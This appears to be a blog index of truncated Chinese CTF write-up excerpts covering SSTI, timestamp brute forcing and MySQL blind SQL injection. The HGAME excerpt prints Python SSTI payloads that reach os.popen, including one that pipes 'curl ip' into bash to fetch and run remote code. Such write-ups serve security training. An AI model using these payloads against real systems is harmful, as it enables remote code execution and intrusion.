HGAME 2021 Writeup

Level - Week3 Forgetful 考点:简单python-SSTI 题目是一个记事本,添加描述的时候存在SSTI,在查看页面可以看到SSTI已经成功了: 最为常规的payload: {{[].__class__.__mro__[1].__subclasses__()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('ls /').read()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('curl ip|bash').read()}} 因为命令执行处有waf,所以可以选择直接……

starCTF 2021 复现

oh-my-note 考点:时间戳爆破 题目分析 先给了源码:source.zip 题目是一个留言板,发布留言的时候输入用户名可以选择为公开或者私有 代码审计 打开源码,审计; 在create_note()函数中,如果用户不存在,就……

纵横杯 Writeup by X1cT34m

web easyci 考点:MySQL读写文件 和巅峰极客的前端一样,而且发现也是布尔盲注,一阵狂喜; fuzz一番竟然没有任何过滤 exp: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44……

RoarCTF 2020

ezsql 考点:布尔盲注,MySQL_8.0.19新特性table语句,无列名盲注 截图截没有了,忘了,简单说下思路: 传统艺能sqli,本来是一个常规的布尔盲注,不过由于waf写的很黑,大小写ban掉了sele……